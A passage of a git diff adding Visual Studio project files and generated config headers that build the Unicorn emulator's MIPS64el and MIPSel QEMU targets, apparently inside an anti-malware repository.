</ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile 
Include="..\..\..\qemu\hw\mips\mips_r4k.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c"> + <Filter>target-mips</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/config-target.h new file mode 100644 index 0000000..95c8351 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ 
+#define TARGET_ABI_MIPSN64 1 +#define TARGET_MIPS64 1 +#define TARGET_NAME "mips64el" +#define TARGET_MIPS 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/mips64el-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/mips64el-softmmu.vcxproj new file mode 100644 index 0000000..03b981b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/mips64el-softmmu.vcxproj @@ -0,0 +1,237 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude 
Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\mips64el.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild 
Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{4478909E-6983-425C-9D9F-558CF258E61E}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>mips64elsoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + 
<ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + 
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64el.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + 
<AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64el.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64el.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + 
<Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64el.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/mips64el-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/mips64el-softmmu.vcxproj.filters new file mode 100644 index 0000000..88aa508 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/mips64el-softmmu.vcxproj.filters @@ -0,0 +1,128 @@ +<?xml 
version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{2b2b58ad-804f-435b-b55d-1c21e050cf31}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{a6046583-2534-498c-9bd2-08dd8c222c18}</UniqueIdentifier> + </Filter> + <Filter Include="hw\mips"> + <UniqueIdentifier>{2253570a-0bc0-4366-9eab-095257ab37b2}</UniqueIdentifier> + </Filter> + <Filter Include="target-mips"> + <UniqueIdentifier>{de33cbbc-f374-4451-a083-23c5a98c843e}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{b4ef3640-fe65-476d-9b4f-3c6d82a5dbfd}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{95533292-741a-46c5-a003-cbb60c8654ce}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h"> + 
<Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\mips64el.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c"> + 
<Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c"> + <Filter>target-mips</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/config-target.h new file mode 100644 index 0000000..68b5238 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_ABI_MIPSO32 1 +#define TARGET_MIPS 1 +#define TARGET_NAME "mipsel" +#define TARGET_MIPS 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/mipsel-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/mipsel-softmmu.vcxproj new file mode 100644 index 0000000..b522af3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/mipsel-softmmu.vcxproj @@ -0,0 +1,237 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + 
<Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\mipsel.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c" /> + <ClCompile 
Include="..\..\..\qemu\target-mips\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{006A7908-ABF3-4D18-BC35-0A29E39B95F9}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>mipselsoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> 
+ <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import 